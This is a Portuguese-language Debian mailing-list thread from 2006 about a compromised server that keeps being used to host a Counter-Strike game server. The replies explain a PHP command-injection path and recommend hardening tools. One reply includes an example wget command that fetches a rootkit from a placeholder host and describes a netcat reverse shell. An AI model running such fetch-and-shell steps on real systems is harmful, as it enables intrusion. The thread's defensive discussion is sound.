Caros,
No meu caso aconteceu o que o Simon explicou. O cara que configurou o servidor não acertou a parte de segurança permitindo que um usuario mal intencionado executasse um script. O pior que o cara foi dar uma de gostosão instalando o Slackware porque é bme seguro. Mas não adianta vc ter uma distribuição segura, mas vc não corrige as falhas. Eu aconselharia vc a refazer o servidor Abs, Sérgio On 11/13/06, Simon Rocher <[EMAIL PROTECTED]> wrote:
Varios sao os motivos: Imagina o seguitne, um exemplo bemmmm besta, e bemmm looser, nunca faca isso :) imagine q vc tem um php q execute uma chamada system e o comando vem de um get ou de um post , e vc tem register_globals = on no seu php.ini pronto, o cara pode ver este seu script e executar qq comando na sua maquina... vamos supor ainda, q o cara executou um wget http://ksjdaskljskla.com/rootkit.tar.gz pra dentro do seu dir /tmp depois descompactou, e rodou um netcat, ou um bot de IRC no caso com o netcat ele poderia estabelecer uma conexao com uma maquina dele ex: MAQUINA DO CARA Seu servidor, saindo com o netcat pra porta 80 do cara... OUVINDO NA PORTA 80 <<<<<============ COM O NETCAT no caso acima o cara jah pega shell na maquina... mas vc ainda consegue ver onde ele mandou seu server se conectar para ele pegar a shell... mas se o cara iniciou um bot de irc por ex na sua maquina, e este bot se conecta a qq rede de irc, ele pode entrar na rede de irc e mandar comandos pro seu server atravez deste bot... o que fazer pra evitar isso ? sao varias as opcoes, depende da usabilidade q precisa: 1- apt-get install bastille Edite o script de firewall dele, e siga as instrucoes para habilitar o controle de saida do firewall. Assim, se o cara tentar baixar algum arquivo ou fazer um fopen de um stream ftp/http q seja, ele nao vai conseguir... Habilitar isso eh BEEEEM chato, pois sempre q vc precisar fazer um include de um stream precisa ter a regra no firewall do bastille, alem de ter q colocar os ips da sua rede, de servers NTP, dos sources do debian etc. 2 - instale o mod_security e configure para as suas necessidades ele jah vem com algumas regras q vc pode habilitar, distribuidas em 3 nives de 'paranoia' 3 - aplique o patch do grsecurity no seu kernel, fica 'duca', vc sabe absolutamente tdo q ocorre na maquina, e pode controlar tdo com o PAX por ex. 4 - coloque algum auditor de arquivos (tripwire por ex) e grave o banco de dados dele em um CD-R, para evitar q banco de dados dele seja alterado. 5 - seja rigoroso com as permissoes de arquivos 6 - desligue o register_globals do php.ini 7 - LIGUE o safe_mode do php.ini isso tdo jah da um talento legal... as 3 ultimas sao as mais simples, e mais faceis de implementar. abracos ----- Original Message ---- From: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> To: Vinicius Andrade Marino <[EMAIL PROTECTED]> Cc: [email protected] Sent: Monday, November 13, 2006 4:19:21 PM Subject: Re:Invasão... Cstrike Opa! Fiquei curioso, não opiniei até agora por desconhecer alguma forma de auxiliar, mas, pq o uso do PHP no WEBServer(Apache) pode permitir isto? O quê deveria ser travado? Wagner Eduardo Bidin Credicard Banco S/A VP Controles Internos WPQA 55 11 3047.9089 [EMAIL PROTECTED] Vinicius Andrade Marino <[EMAIL PROTECTED]> 13/11/2006 13:47 To [email protected] cc Subject Re: Invasão... Cstrike Pelo o que pude notar o invasor conseguiu acesso por web ! apenas me diga isso... Qual aplicação roda no web-server ?(aposto que seria um php!) Qual versão do kernel está rodando atualmente ? E se caso lhe interesse passar as dores de cabeça faça assim: procure o log de acesso do apache e filtre o conteudo assim. cat access_log |grep cmd= |less logo descubrirá o conteudo e tente executar você mesmo ! Em Segunda 13 Novembro 2006 14:39, Paulo de Souza Lima escreveu: > É bão tb. :-) > > Paulo de Souza Lima > Curitiba/PR > Linux User 432358 > > ----- Mensagem original ---- > De: Anacleto Pavão <[EMAIL PROTECTED]> > Para: Paulo de Souza Lima <[EMAIL PROTECTED]>; Lista Debian > <[email protected]> Enviadas: Segunda-feira, 13 de > Novembro de 2006 11:29:20 > Assunto: Re: Invasão... Cstrike > > Nao seria interessante instalar e configurar o SNORT? > > Paulo de Souza Lima <[EMAIL PROTECTED]> escreveu: A maioria > das invasões são facilitadas por pessoas ou equipamentos dentro da empresa. > > Sugiro que você verifique se há algum desktop infectado, pois ele pode > estar monitorando a rede de alguma outra máquina. Outra boa idéia é fazer a > varredura pesada das portas de fora para dentro e de dentro para fora com o > nmap (de fora pra dentro você vai ter de pedir para alguém fazer). Também é > uma boa idéia copiar os logs para outra máquina. Outra coisa: vc tem > certeza de que sua rede não tem backdoors (como acessos adsl ou discados > que não passem pelo firewall, ou ainda, mais de um IP externo no firewall)? > > Me esclarece uma coisa: Ele instalou esse servidor de Counter Strike no > firewall ou num servidor interno à rede? > > Abraços, > > Paulo de Souza Lima > Curitiba/PR > Linux User 432358 > > ----- Mensagem original ---- > De: Daniel <[EMAIL PROTECTED]> > Para: Lista Debian <[email protected]> > Enviadas: Segunda-feira, 13 de Novembro de 2006 9:38:19 > Assunto: Invasão... Cstrike > > <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, > div.MsoNormal > {margin:0cm;margin-bottom:.0001pt;font-size:12.0pt;font-family:"Times New > Roman";}a:link, span.MsoHyperlink > {color:blue;text-decoration:underline;}a:visited, span.MsoHyperlinkFollowed > {color:purple;text-decoration:underline;} span.EstiloDeEmail17 > {font-family:Arial;color:windowtext;}_filtered {margin:70.85pt 3.0cm > 70.85pt 3.0cm;}div.Section1 {}--> Olá pessoal. > > Estou com um problema sério em minha rede. > Semana passada estava dando uma olhada nos logs como de costume e vi que > o log de saída estava enorme (2 Gb). Fui investigar e vi que alguém invadiu > o meu server e criou um servidor de jogo Counter Strike nele. O Engraçado é > que as únicas portas abertas de entrada são a 80 e uma de ssh alternativa. > > Bom, tentei vasculhar como o cara entrou, mas não encontrei nada. > Resolvi refazer o servidor todo. (2 dias de trabalho). Bom, voltei do final > de semana e lá estava tudo de novo. Não consigo entender como o cara > entrou, formatei a máquina, mudei as senhas, tem apenas as duas portas > abertas, mas ta tudo lá. O Login e root está desabilitado para ssh... > enfim, não sei o que o cara fez. E pra piorar, o desgraçado apagou os logs > todos. > > Alguém já passou por algo do tipo, com esses servers de counter strike? > Há algo padrão a se fazer? > Estou completamente perdido, qualquer dica, ajuda, sei lá, seria bem > vindo. > > Grato a todos > > Daniel > > > > > > > > > > O Yahoo! está de cara nova. Venha conferir! > > > > Yahoo! Acesso Grátis - Internet rápida e grátis. Instale o discador agora! > > > > > > > > _______________________________________________________ > Novidade no Yahoo! Mail: receba alertas de novas mensagens no seu celular. > Registre seu aparelho agora! http://br.mobile.yahoo.com/mailalertas/ -- keepTec - Consultoria de Sistemas Linux - +55 (11)95002638 - [EMAIL PROTECTED]
-- _ °v° Sérgio Lopes- Analista de Sistema /(_)\ São Paulo - SP - BRAZIL ^ ^ Linux user number 373166
